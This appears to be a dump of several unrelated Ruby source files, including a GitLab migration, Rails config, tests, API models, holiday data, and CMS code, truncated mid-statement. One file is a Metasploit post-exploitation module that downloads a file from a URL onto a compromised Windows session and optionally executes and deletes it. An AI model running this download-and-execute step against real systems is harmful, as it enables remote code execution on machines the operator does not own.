# frozen_string_literal: true module Gitlab module BackgroundMigration module ProjectNamespaces # Back-fill project namespaces for projects that do not yet have a namespace. # # rubocop: disable Metrics/ClassLength class BackfillProjectNamespaces attr_accessor :project_ids, :sub_batch_size SUB_BATCH_SIZE = 25 PROJECT_NAMESPACE_STI_NAME = 'Project' IsolatedModels = ::Gitlab::BackgroundMigration::ProjectNamespaces::Models def perform(start_id, end_id, migration_table_name, migration_column_name, sub_batch_size, pause_ms, namespace_id, migration_type = 'up') @sub_batch_size = sub_batch_size || SUB_BATCH_SIZE load_project_ids(start_id, end_id, namespace_id) case migration_type when 'up' backfill_project_namespaces mark_job_as_succeeded(start_id, end_id, namespace_id, 'up') when 'down' cleanup_backfilled_project_namespaces(namespace_id) mark_job_as_succeeded(start_id, end_id, namespace_id, 'down') else raise "Unknown migration type" end end def backfill_project_namespaces project_ids.each_slice(sub_batch_size) do |project_ids| # cleanup gin indexes on namespaces table cleanup_gin_index('namespaces') # cleanup gin indexes on projects table cleanup_gin_index('projects') # We need to lock these project records for the period when we create project namespaces # and link them to projects so that if a project is modified in the time between creating # project namespaces `batch_insert_namespaces` and linking them to projects `batch_update_projects` # we do not get them out of sync. # # see https://gitlab.com/gitlab-org/gitlab/-/merge_requests/72527#note_730679469 Project.transaction do Project.where(id: project_ids).select(:id).lock!('FOR UPDATE').load batch_insert_namespaces(project_ids) batch_update_projects(project_ids) batch_update_project_namespaces_traversal_ids(project_ids) end end end def cleanup_gin_index(table_name) index_names = ApplicationRecord.connection.select_values("select indexname::text from pg_indexes where tablename = '#{table_name}' and indexdef ilike '%gin%'") index_names.each do |index_name| ApplicationRecord.connection.execute("select gin_clean_pending_list('#{index_name}')") end end private def cleanup_backfilled_project_namespaces(namespace_id) project_ids.each_slice(sub_batch_size) do |project_ids| # IMPORTANT: first nullify project_namespace_id in projects table to avoid removing projects when records # from namespaces are deleted due to FK/triggers nullify_project_namespaces_in_projects(project_ids) delete_project_namespace_records(project_ids) end end def batch_insert_namespaces(project_ids) projects = IsolatedModels::Project.where(id: project_ids) .select("projects.id, projects.name, projects.path, projects.namespace_id, projects.visibility_level, shared_runners_enabled, '#{PROJECT_NAMESPACE_STI_NAME}', now(), now()") ApplicationRecord.connection.execute <<~SQL INSERT INTO namespaces (tmp_project_id, name, path, parent_id, visibility_level, shared_runners_enabled, type, created_at, updated_at) #{projects.to_sql} ON CONFLICT DO NOTHING; SQL end def batch_update_projects(project_ids) projects = IsolatedModels::Project.where(id: project_ids) .joins("INNER JOIN namespaces ON projects.id = namespaces.tmp_project_id") .select("namespaces.id, namespaces.tmp_project_id") ApplicationRecord.connection.execute <<~SQL WITH cte(project_namespace_id, project_id) AS #{::Gitlab::Database::AsWithMaterialized.materialized_if_supported} ( #{projects.to_sql} ) UPDATE projects SET project_namespace_id = cte.project_namespace_id FROM cte WHERE id = cte.project_id AND projects.project_namespace_id IS DISTINCT FROM cte.project_namespace_id SQL end def batch_update_project_namespaces_traversal_ids(project_ids) namespaces = Namespace.where(tmp_project_id: project_ids) .joins("INNER JOIN namespaces n2 ON namespaces.parent_id = n2.id") .select("namespaces.id as project_namespace_id, n2.traversal_ids") ApplicationRecord.connection.execute <<~SQL UPDATE namespaces SET traversal_ids = array_append(project_namespaces.traversal_ids, project_namespaces.project_namespace_id) FROM (#{namespaces.to_sql}) as project_namespaces(project_namespace_id, traversal_ids) WHERE id = project_namespaces.project_namespace_id SQL end def nullify_project_namespaces_in_projects(project_ids) IsolatedModels::Project.where(id: project_ids).update_all(project_namespace_id: nil) end def delete_project_namespace_records(project_ids) # keep the deletes a 10x smaller batch as deletes seem to be much more expensive delete_batch_size = (sub_batch_size / 10).to_i + 1 project_ids.each_slice(delete_batch_size) do |p_ids| IsolatedModels::Namespace.where(type: PROJECT_NAMESPACE_STI_NAME).where(tmp_project_id: p_ids).delete_all end end def load_project_ids(start_id, end_id, namespace_id) projects = IsolatedModels::Project.arel_table relation = IsolatedModels::Project.where(projects[:id].between(start_id..end_id)) relation = relation.where(projects[:namespace_id].in(Arel::Nodes::SqlLiteral.new(self.class.hierarchy_cte(namespace_id)))) if namespace_id @project_ids = relation.pluck(:id) end def mark_job_as_succeeded(*arguments) ::Gitlab::Database::BackgroundMigrationJob.mark_all_as_succeeded('BackfillProjectNamespaces', arguments) end def self.hierarchy_cte(root_namespace_id) <<-SQL WITH RECURSIVE "base_and_descendants" AS ( ( SELECT "namespaces"."id" FROM "namespaces" WHERE "namespaces"."type" = 'Group' AND "namespaces"."id" = #{root_namespace_id.to_i} ) UNION ( SELECT "namespaces"."id" FROM "namespaces", "base_and_descendants" WHERE "namespaces"."type" = 'Group' AND "namespaces"."parent_id" = "base_and_descendants"."id" ) ) SELECT "id" FROM "base_and_descendants" AS "namespaces" SQL end end # rubocop: enable Metrics/ClassLength end end end
44.073171
185
0.653154
180db50bbfebc69f97190f43b0161359d3ffcee3
1,530
require_relative 'boot' require "rails" # Pick the frameworks you want: require "active_model/railtie" require "active_job/railtie" require "active_record/railtie" require "active_storage/engine" require "action_controller/railtie" require "action_mailer/railtie" require "action_mailbox/engine" require "action_text/engine" require "action_view/railtie" require "action_cable/engine" # require "sprockets/railtie" require "rails/test_unit/railtie" # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) module Slots class Application < Rails::Application # Initialize configuration defaults for originally generated Rails version. config.load_defaults 6.0 # Settings in config/environments/* take precedence over those specified here. # Application configuration can go into files in config/initializers # -- all .rb files in that directory are automatically loaded after loading # the framework and any gems in your application. # Only loads a smaller set of middleware suitable for API only apps. # Middleware like session, flash, cookies can be added back manually. # Skip views, helpers and assets when generating a new resource. config.api_only = true #CORS Related Items config.middleware.insert_before 0, Rack::Cors do allow do origins '*' resource('*', headers: :any, methods: [:get, :patch, :delete, :post, :options]) end end end end
32.553191
87
0.745098
182d154e531c2817f2a93051a3244623a0278eeb
1,449
module RSpec module Matchers module BuiltIn class BeWithin include MatchAliases def initialize(delta) @delta = delta end def matches?(actual) @actual = actual raise needs_expected unless defined? @expected raise needs_subtractable unless @actual.respond_to? :- (@actual - @expected).abs <= @tolerance end def of(expected) @expected = expected @tolerance = @delta @unit = '' self end def percent_of(expected) @expected = expected @tolerance = @delta * @expected.abs / 100.0 @unit = '%' self end def failure_message_for_should "expected #{@actual} to #{description}" end def failure_message_for_should_not "expected #{@actual} not to #{description}" end def description "be within #{@delta}#{@unit} of #{@expected}" end # @private def supports_block_expectations? false end private def needs_subtractable ArgumentError.new "The actual value (#{@actual.inspect}) must respond to `-`" end def needs_expected ArgumentError.new "You must set an expected value using #of: be_within(#{@delta}).of(expected_value)" end end end end end
23.370968
111
0.541753
1a30c847846d4ba516d459fd807ccc725181631a
1,475
# Copyright 2011-2012 Rice University. Licensed under the Affero General Public # License version 3 or later. See the COPYRIGHT file for details. require 'test_helper' class ConsentFormsControllerTest < ActionController::TestCase setup do @consent_form = consent_forms(:one) end test "should get index" do get :index assert_response :success assert_not_nil assigns(:consent_forms) end test "should get new" do get :new assert_response :success end test "should create consent_form" do assert_difference('ConsentForm.count') do post :create, consent_form: { esignature_required: @consent_form.esignature_required, html: @consent_form.html, name: @consent_form.name } end assert_redirected_to consent_form_path(assigns(:consent_form)) end test "should show consent_form" do get :show, id: @consent_form assert_response :success end test "should get edit" do get :edit, id: @consent_form assert_response :success end test "should update consent_form" do put :update, id: @consent_form, consent_form: { esignature_required: @consent_form.esignature_required, html: @consent_form.html, name: @consent_form.name } assert_redirected_to consent_form_path(assigns(:consent_form)) end test "should destroy consent_form" do assert_difference('ConsentForm.count', -1) do delete :destroy, id: @consent_form end assert_redirected_to consent_forms_path end end
27.830189
160
0.743729
ffb6da34200b4bbc3ef7a41f50175b280c0ccaee
313
require "afmotion" unless defined?(Motion::Project::Config) raise "This file must be required within a RubyMotion project Rakefile." end lib_dir_path = File.dirname(File.expand_path(__FILE__)) Motion::Project::App.setup do |app| app.files.unshift(Dir.glob(File.join(lib_dir_path, "motion-giphy/*.rb"))) end
28.454545
75
0.763578
1820299a714bb4888edb41422185f51aa27efc6d
328
require './config/environment' if defined?(ActiveRecord::Migrator) && ActiveRecord::Migrator.needs_migration? raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.' end use Rack::MethodOverride use Sass::Plugin::Rack use UsersController use RoomsController use ItemsController run ApplicationController
25.230769
78
0.807927
ffe0cdf2e564438e76bfb2e9b7bd48ccd917d5c5
4,168
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::Post::File def initialize(info = {}) super( update_info( info, 'Name' => "Windows Manage Download and/or Execute", 'Description' => %q{ This module will download a file by importing urlmon via railgun. The user may also choose to execute the file with arguments via exec_string. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['RageLtMan <rageltman[at]sempervictus>'], 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_fs_delete_file stdapi_fs_file_expand_path stdapi_fs_stat stdapi_railgun_api stdapi_sys_config_getenv ] } } ) ) register_options( [ OptString.new('URL', [true, 'Full URL of file to download' ]), OptString.new('DOWNLOAD_PATH', [false, 'Full path for downloaded file' ]), OptString.new('FILENAME', [false, 'Name for downloaded file' ]), OptBool.new('OUTPUT', [true, 'Show execution output', true ]), OptBool.new('EXECUTE', [true, 'Execute file after completion', false ]), ] ) register_advanced_options( [ OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]), OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]), OptBool.new('DELETE', [true, 'Delete file after execution', false ]), ] ) end # Check to see if our dll is loaded, load and configure if not def add_railgun_urlmon if client.railgun.libraries.find_all { |d| d.first == 'urlmon' }.empty? session.railgun.add_dll('urlmon', 'urlmon') session.railgun.add_function( 'urlmon', 'URLDownloadToFileW', 'DWORD', [ ['PBLOB', 'pCaller', 'in'], ['PWCHAR', 'szURL', 'in'], ['PWCHAR', 'szFileName', 'in'], ['DWORD', 'dwReserved', 'in'], ['PBLOB', 'lpfnCB', 'inout'] ] ) vprint_good("urlmon loaded and configured") else vprint_status("urlmon already loaded") end end def run # Make sure we meet the requirements before running the script, note no need to return # unless error return 0 if session.type != "meterpreter" # get time strtime = Time.now # check/set vars url = datastore["URL"] filename = datastore["FILENAME"] || url.split('/').last path = datastore['DOWNLOAD_PATH'] if path.blank? path = session.sys.config.getenv('TEMP') else path = session.fs.file.expand_path(path) end outpath = path + '\\' + filename exec = datastore['EXECUTE'] exec_string = datastore['EXEC_STRING'] output = datastore['OUTPUT'] remove = datastore['DELETE'] # set up railgun add_railgun_urlmon # get our file vprint_status("Downloading #{url} to #{outpath}") client.railgun.urlmon.URLDownloadToFileW(nil, url, outpath, 0, nil) # check our results begin out = session.fs.file.stat(outpath) print_status("#{out.stathash['st_size']} bytes downloaded to #{outpath} in #{(Time.now - strtime).to_i} seconds ") rescue print_error("File not found. The download probably failed") return end # Execute file upon request if exec begin cmd = "\"#{outpath}\" #{exec_string}" print_status("Executing file: #{cmd}") res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT']) print_good(res) if output and not res.empty? rescue ::Exception => e print_error("Unable to execute: #{e.message}") end end # remove file if needed if remove begin print_status("Deleting #{outpath}") session.fs.file.rm(outpath) rescue ::Exception => e print_error("Unable to remove file: #{e.message}") end end end end
29.560284
120
0.595489
f7b01dde15ec5b5bcc00f60052355278775e7b60
7,894
=begin #Tatum API ## Authentication <!-- ReDoc-Inject: <security-definitions> --> OpenAPI spec version: 3.9.0 Generated by: https://github.com/swagger-api/swagger-codegen.git Swagger Codegen version: 3.0.31 =end require 'date' module Tatum class FlowAccountKeys # Index of the public key. attr_accessor :index attr_accessor :public_key # Type of signature algorithm. 2 - ECDSA_secp256k1 attr_accessor :sign_algo # Type of hash algo. 3 - SHA3_256 attr_accessor :hash_algo # Number of outgoing transactions for this public key. attr_accessor :sequence_number attr_accessor :revoked # Weight of the key. 1000 means single signature necessary. attr_accessor :weight # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { :'index' => :'index', :'public_key' => :'publicKey', :'sign_algo' => :'signAlgo', :'hash_algo' => :'hashAlgo', :'sequence_number' => :'sequenceNumber', :'revoked' => :'revoked', :'weight' => :'weight' } end # Attribute type mapping. def self.openapi_types { :'index' => :'Object', :'public_key' => :'Object', :'sign_algo' => :'Object', :'hash_algo' => :'Object', :'sequence_number' => :'Object', :'revoked' => :'Object', :'weight' => :'Object' } end # List of attributes with nullable: true def self.openapi_nullable Set.new([ ]) end # Initializes the object # @param [Hash] attributes Model attributes in the form of hash def initialize(attributes = {}) if (!attributes.is_a?(Hash)) fail ArgumentError, "The input argument (attributes) must be a hash in `Tatum::FlowAccountKeys` initialize method" end # check to see if the attribute exists and convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| if (!self.class.attribute_map.key?(k.to_sym)) fail ArgumentError, "`#{k}` is not a valid attribute in `Tatum::FlowAccountKeys`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect end h[k.to_sym] = v } if attributes.key?(:'index') self.index = attributes[:'index'] end if attributes.key?(:'public_key') self.public_key = attributes[:'public_key'] end if attributes.key?(:'sign_algo') self.sign_algo = attributes[:'sign_algo'] end if attributes.key?(:'hash_algo') self.hash_algo = attributes[:'hash_algo'] end if attributes.key?(:'sequence_number') self.sequence_number = attributes[:'sequence_number'] end if attributes.key?(:'revoked') self.revoked = attributes[:'revoked'] end if attributes.key?(:'weight') self.weight = attributes[:'weight'] end end # Show invalid properties with the reasons. Usually used together with valid? # @return Array for valid properties with the reasons def list_invalid_properties invalid_properties = Array.new invalid_properties end # Check to see if the all the properties in the model are valid # @return true if the model is valid def valid? true end # Checks equality by comparing each attribute. # @param [Object] Object to be compared def ==(o) return true if self.equal?(o) self.class == o.class && index == o.index && public_key == o.public_key && sign_algo == o.sign_algo && hash_algo == o.hash_algo && sequence_number == o.sequence_number && revoked == o.revoked && weight == o.weight end # @see the `==` method # @param [Object] Object to be compared def eql?(o) self == o end # Calculates hash code according to all attributes. # @return [Integer] Hash code def hash [index, public_key, sign_algo, hash_algo, sequence_number, revoked, weight].hash end # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def self.build_from_hash(attributes) new.build_from_hash(attributes) end # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.openapi_types.each_pair do |key, type| if type =~ /\AArray<(.*)>/i # check to ensure the input is an array given that the attribute # is documented as an array but the input is not if attributes[self.class.attribute_map[key]].is_a?(Array) self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) }) end elsif !attributes[self.class.attribute_map[key]].nil? self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]])) elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key) self.send("#{key}=", nil) end end self end # Deserializes the data based on type # @param string type Data type # @param string value Value to be deserialized # @return [Object] Deserialized data def _deserialize(type, value) case type.to_sym when :DateTime DateTime.parse(value) when :Date Date.parse(value) when :String value.to_s when :Integer value.to_i when :Float value.to_f when :Boolean if value.to_s =~ /\A(true|t|yes|y|1)\z/i true else false end when :Object # generic object (usually a Hash), return directly value when /\AArray<(?<inner_type>.+)>\z/ inner_type = Regexp.last_match[:inner_type] value.map { |v| _deserialize(inner_type, v) } when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/ k_type = Regexp.last_match[:k_type] v_type = Regexp.last_match[:v_type] {}.tap do |hash| value.each do |k, v| hash[_deserialize(k_type, k)] = _deserialize(v_type, v) end end else # model Tatum.const_get(type).build_from_hash(value) end end # Returns the string representation of the object # @return [String] String presentation of the object def to_s to_hash.to_s end # to_body is an alias to to_hash (backward compatibility) # @return [Hash] Returns the object in the form of hash def to_body to_hash end # Returns the object in the form of hash # @return [Hash] Returns the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = self.send(attr) if value.nil? is_nullable = self.class.openapi_nullable.include?(attr) next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}")) end hash[param] = _to_hash(value) end hash end # Outputs non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value # @param [Object] value Any valid value # @return [Hash] Returns the value in the form of hash def _to_hash(value) if value.is_a?(Array) value.compact.map { |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end
29.676692
200
0.611224
edf8e1841a990ad1f1cab997dc65737fb37860c6
600
require "dry-transaction" require "berg/transactions" require "admin/container" require "admin/import" module Admin class Transactions < Berg::Transactions class StepAdapters < Dry::Transaction::StepAdapters class Enqueue include Admin::Import("enqueue") def call(step, *args, input) enqueue.(step.operation_name, *args, input) Right(input) end end register :enqueue, Enqueue.new end configure do |config| config.container = Admin::Container config.options = {step_adapters: StepAdapters} end end end
21.428571
55
0.663333
6a5c7d2749d4bd2ef9bace45b4daa1a021df3aaf
7,269
# frozen_string_literal: true require "spec_helper" RSpec.describe Files::MultiService do subject { described_class.new(project, user, commit_params) } let(:project) { create(:project, :repository) } let(:repository) { project.repository } let(:user) { create(:user) } let(:branch_name) { project.default_branch } let(:original_file_path) { 'files/ruby/popen.rb' } let(:new_file_path) { 'files/ruby/popen.rb' } let(:file_content) { 'New content' } let(:action) { 'update' } let(:commit_message) { 'Update File' } let!(:original_commit_id) do Gitlab::Git::Commit.last_for_path(project.repository, branch_name, original_file_path).sha end let(:default_action) do { action: action, file_path: new_file_path, previous_path: original_file_path, content: file_content, last_commit_id: original_commit_id } end let(:actions) { [default_action] } let(:commit_params) do { commit_message: commit_message, branch_name: branch_name, start_branch: branch_name, actions: actions } end before do project.add_maintainer(user) end describe '#execute' do context 'with a valid action' do it 'returns a hash with the :success status' do results = subject.execute expect(results[:status]).to eq(:success) end end context 'with an invalid action' do let(:action) { 'rename' } it 'returns a hash with the :error status' do results = subject.execute expect(results[:status]).to eq(:error) expect(results[:message]).to match(/Unknown action/) end end describe 'Updating files' do context 'when the file has been previously updated' do before do update_file(original_file_path) end it 'rejects the commit' do results = subject.execute expect(results[:status]).to eq(:error) expect(results[:message]).to match(new_file_path) end end context 'when the file have not been modified' do it 'accepts the commit' do results = subject.execute expect(results[:status]).to eq(:success) end end end describe 'changing execute_filemode of a file' do let(:commit_message) { 'Chmod +x file' } let(:file_path) { original_file_path } let(:default_action) do { action: 'chmod', file_path: file_path, execute_filemode: true } end it 'accepts the commit' do results = subject.execute expect(results[:status]).to eq(:success) end it 'updates the execute_filemode of the file' do expect { subject.execute }.to change { repository.blob_at_branch(branch_name, file_path).mode }.from('100644').to('100755') end context "when the file doesn't exists" do let(:file_path) { 'files/wrong_path.rb' } it 'rejects the commit' do results = subject.execute expect(results[:status]).to eq(:error) expect(results[:message]).to eq("A file with this name doesn't exist") end end end context 'when moving a file' do let(:action) { 'move' } let(:new_file_path) { 'files/ruby/new_popen.rb' } let(:result) { subject.execute } let(:blob) { repository.blob_at_branch(branch_name, new_file_path) } context 'when original file has been updated' do before do update_file(original_file_path) end it 'rejects the commit' do expect(result[:status]).to eq(:error) expect(result[:message]).to match(original_file_path) end end context 'when original file has not been updated' do it 'moves the file' do expect(result[:status]).to eq(:success) expect(blob).to be_present expect(blob.data).to eq(file_content) end context 'when content is nil' do let(:file_content) { nil } it 'moves the existing content untouched' do original_content = repository.blob_at_branch(branch_name, original_file_path).data expect(result[:status]).to eq(:success) expect(blob).to be_present expect(blob.data).to eq(original_content) end end context 'when content is an empty string' do let(:file_content) { '' } it 'moves the file and empties it' do expect(result[:status]).to eq(:success) expect(blob).not_to be_nil expect(blob.data).to eq('') end end end end context 'when creating a file matching an LFS filter' do let(:action) { 'create' } let(:branch_name) { 'lfs' } let(:new_file_path) { 'test_file.lfs' } before do allow(project).to receive(:lfs_enabled?).and_return(true) end it 'creates an LFS pointer' do subject.execute blob = repository.blob_at('lfs', new_file_path) expect(blob.data).to start_with(Gitlab::Git::LfsPointerFile::VERSION_LINE) end it "creates an LfsObject with the file's content" do subject.execute expect(LfsObject.last.file.read).to eq file_content end context 'with base64 encoded content' do let(:raw_file_content) { 'Raw content' } let(:file_content) { Base64.encode64(raw_file_content) } let(:actions) { [default_action.merge(encoding: 'base64')] } it 'creates an LFS pointer' do subject.execute blob = repository.blob_at('lfs', new_file_path) expect(blob.data).to start_with(Gitlab::Git::LfsPointerFile::VERSION_LINE) end it "creates an LfsObject with the file's content" do subject.execute expect(LfsObject.last.file.read).to eq raw_file_content end end it 'links the LfsObject to the project' do expect do subject.execute end.to change { project.lfs_objects.count }.by(1) end end context 'when file status validation is skipped' do let(:action) { 'create' } let(:new_file_path) { 'files/ruby/new_file.rb' } it 'does not check the last commit' do expect(Gitlab::Git::Commit).not_to receive(:last_for_path) subject.execute end it 'creates the file' do subject.execute blob = project.repository.blob_at_branch(branch_name, new_file_path) expect(blob).to be_present end end context 'when force is set to true and branch already exists' do let(:commit_params) do { commit_message: commit_message, branch_name: 'feature', start_branch: 'master', actions: actions, force: true } end it 'is still a success' do expect(subject.execute[:status]).to eq(:success) end end end def update_file(path) params = { file_path: path, start_branch: branch_name, branch_name: branch_name, commit_message: 'Update file', file_content: 'New content' } Files::UpdateService.new(project, user, params).execute end end
26.922222
131
0.615628
1d9c2261ea3747f4f37338a6a69e598f005e5383
3,737
# encoding: utf-8 module Holidays # This file is generated by the Ruby Holidays gem. # # Definitions loaded: data/is.yaml # # To use the definitions in this file, load it right after you load the # Holiday gem: # # require 'holidays' # require 'holidays/is' # # All the definitions are available at https://github.com/alexdunae/holidays module IS # :nodoc: def self.defined_regions [:is] end def self.holidays_by_month { 5 => [{:mday => 1, :name => "Verkalýðsdagurinn", :regions => [:is]}, {:mday => 13, :name => "Mæðradagurinn", :regions => [:is]}], 0 => [{:function => lambda { |year| Holidays.easter(year)-48 }, :function_id => "easter(year)-48", :name => "Bolludagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-47 }, :function_id => "easter(year)-47", :name => "Sprengidagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-46 }, :function_id => "easter(year)-46", :name => "Öskudagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-7 }, :function_id => "easter(year)-7", :name => "Pálmasunnudagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-3 }, :function_id => "easter(year)-3", :name => "Skírdagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)-2 }, :function_id => "easter(year)-2", :name => "Föstudaginn langi", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year) }, :function_id => "easter(year)", :name => "Páskadagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+1 }, :function_id => "easter(year)+1", :name => "Annar í páskum", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+39 }, :function_id => "easter(year)+39", :name => "Uppstigningardagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+49 }, :function_id => "easter(year)+49", :name => "Hvítasunnudagur", :regions => [:is]}, {:function => lambda { |year| Holidays.easter(year)+50 }, :function_id => "easter(year)+50", :name => "Annar í hvítasunnu", :regions => [:is]}], 11 => [{:mday => 16, :name => "Dagur íslenskrar tungu", :regions => [:is]}], 6 => [{:mday => 3, :type => :informal, :name => "Sjómannadagurinn", :regions => [:is]}, {:mday => 17, :name => "Lýðveldisdagurinn", :regions => [:is]}], 1 => [{:mday => 1, :name => "Nýársdagur", :regions => [:is]}, {:mday => 6, :name => "Þrettándinn", :regions => [:is]}, {:mday => 19, :type => :informal, :name => "Bóndadagur", :regions => [:is]}], 12 => [{:mday => 24, :name => "Jól", :regions => [:is]}, {:mday => 25, :name => "Jól", :regions => [:is]}, {:mday => 26, :name => "Jól", :regions => [:is]}, {:mday => 31, :name => "Gamlárskvöld", :regions => [:is]}], 2 => [{:mday => 18, :type => :informal, :name => "Konudagur", :regions => [:is]}], 8 => [{:wday => 1, :week => 1, :name => "Frídagur verslunarmanna", :regions => [:is]}], 4 => [{:function => lambda { |year| Holidays.is_sumardagurinn_fyrsti(year) }, :function_id => "is_sumardagurinn_fyrsti(year)", :name => "Sumardagurinn fyrsti", :regions => [:is]}] } end end # Iceland: first day of summer (Thursday after 18 April) def self.is_sumardagurinn_fyrsti(year) date = Date.civil(year,4,18) if date.wday < 4 date += (4 - date.wday) else date date += (11 - date.wday) end date end end Holidays.merge_defs(Holidays::IS.defined_regions, Holidays::IS.holidays_by_month)
55.776119
185
0.560075
e8db002d0b9e9225052996c910afa5e843967b43
1,169
require 'test_helper' class UsersControllerTest < ActionDispatch::IntegrationTest def setup @user = users(:michael) @other_user = users(:archer) end test "should redirect index when not logged in" do get users_path assert_redirected_to login_url end test "should get new" do get signup_path assert_response :success end test "should redirect edit when not logged in" do get edit_user_path(@user) assert_not flash.empty? assert_redirected_to login_url end test "should redirect update when not logged in" do patch user_path(@user), params: { user: { name: @user.name, email: @user.email } } assert_not flash.empty? assert_redirected_to login_url end test "should redirect destroy when not logged in" do assert_no_difference 'User.count' do delete user_path(@user) end assert_redirected_to login_url end test "should redirect destroy when logged in as a non-admin" do log_in_as(@other_user) assert_no_difference 'User.count' do delete user_path(@user) end assert_redirected_to root_url end end
24.87234
68
0.686912
bbb1bd3bc029973641505a698266323067a9254e
2,534
# Project 60. # plan.io 10270 # bundle exec rake export:death fname='AIDS_ANNUAL_2016_TEST.txt' original_filename="deaths/SUBSET MBIS_Deaths_Subset_2016_skip1.txt" klass=Export::AidsDeathsAnnual project_name='Annual ONS Deaths for HIV Surveillance' team_name='HIV and STI Department' module Export class AidsDeathsAnnual < DeathFile SURVEILLANCE_CODES = { 'aids99' => / ^(A\d{2}|B\d{2}|C\d{2}|D[0-8][0-9]|E[0-8][0-9]|(F0[1-9]|F[1-9][0-9])| G\d{2}|H|I\d{4}|J\d{2}|(K0[0-8][0-9]|K9[0-5])|L\d{2}|M\d{2}|N\d{2}| O0[0-9]|O9A|(P0[0-8][0-9]|P9[0-6])|Q\d{2}|R\d{2}|S\d{2}| (T0[0-7][0-9]|T8[0-8])|V\d{2}|W\d{2}|X\d{2}|Y\d{2}|Z\d{2}) /x }.freeze def initialize(filename, e_type, ppats, filter = 'aids99') super @icd_fields_f = (1..20).collect { |i| ["icdf_#{i}", "icdpvf_#{i}"] }.flatten + %w(icduf) @icd_fields = (1..20).collect { |i| ["icd_#{i}", "icdpv_#{i}"] }.flatten + %w(icdu) end # kL/MS From looking at previous code we believe the following project node names equate to: # icd9sc_icd10sc => icdsc icdscf # icd9uf_icd10uf => icdu icduf # kL/MS From looking at previous code we believe the following project node names equate to: # fnamdx => fnamdx_1 fnamdx_2 # codt => codt_codfft which transforms to codfft in death_file.rb def fields %w[addrdt fnamd1 fnamd2 fnamd3 fnamdx_1 fnamdx_2 certifer] + %w[icdsc icdscf icdu icduf] + %w[podt dod dob sex ctrypob occdt pobt corcertt dor] + (1..6).collect { |i| "codt_codfft_#{i}" } + (1..4).collect { |i| "occfft_#{i}" } + %w[snamd] + (1..5).collect { |i| "aksnamd_#{i}" } end private def csv_options { col_sep: '|', row_sep: "\r\n" } end def match_row?(ppat, _surveillance_code = nil) return false unless ppat.death_data.dor >= '20010101' pattern = SURVEILLANCE_CODES[@filter] icd_fields = @icd_fields_f # Check only final codes, if any present, otherwise provisional codes icd_fields = @icd_fields if icd_fields.none? { |field| ppat.death_data.send(field).present? } return false if icd_fields.none? { |field| ppat.death_data.send(field) =~ pattern } true end def extract_row(ppat, _j) return unless match_row?(ppat) ppat.unlock_demographics('', '', '', :export) fields.collect { |field| extract_field(ppat, field) } end end end
43.689655
253
0.59708
39b16ab37451bfe3165364edbf9f2d3f6a1d406b
3,062
module Cms::Lib::Layout def self.current_concept concept = defined?(Page.current_item.concept) ? Page.current_item.concept : nil concept ||= Page.current_node.inherited_concept end def self.inhertited_concepts return [] unless current_concept current_concept.ancestors.reverse end def self.inhertited_layout layout = defined?(Page.current_item.layout) ? Page.current_item.layout : nil layout ||= Page.current_node.inherited_layout end def self.concepts_order(concepts, options = {}) return 'concept_id' if concepts.blank? table = options.has_key?(:table_name) ? options[:table_name] + '.' : '' order = "CASE #{table}concept_id" concepts.each_with_index {|c, i| order += " WHEN #{c.id} THEN #{i}"} order += " ELSE 100 END, #{table}id" end def self.find_design_pieces(html, concepts, params) names = html.scan(/\[\[piece\/([^\]]+)\]\]/).map{|n| n[0] }.uniq return {} if names.blank? relations = names.map do |name| rel = Cms::Piece.where(state: 'public') name_array = name.split('#') rel = if name_array.size > 1 # [[piece/name#id]] rel.where(id: name_array[1], name: name_array[0]) else # [[piece/name]] concept_ids = concepts.map(&:id) concept_ids << nil rel.where(name: name_array[0]) .where(concept_id: concept_ids) end rel.select("*, #{Cms::DataFile.connection.quote(name)}::text as name_with_option") .order(concepts_order(concepts)).limit(1) end pieces = Cms::Piece.union(relations).index_by(&:name_with_option) if Core.mode == 'preview' && params[:piece_id] item = Cms::Piece.find_by(id: params[:piece_id]) pieces[item.name] = item if item end pieces end def self.find_data_texts(html, concepts) names = html.scan(/\[\[text\/([0-9a-zA-Z\._-]+)\]\]/).flatten.uniq return {} if names.blank? relations = names.map do |name| Cms::DataText.public_state.where(name: name, concept_id: [nil] + concepts.to_a) .order(concepts_order(concepts)).limit(1) end Cms::DataText.union(relations).index_by(&:name) end def self.find_data_files(html, concepts) names = html.scan(/\[\[file\/([^\]]+)\]\]/).flatten.uniq return {} if names.blank? relations = names.map do |name| dirname = ::File.dirname(name) basename = 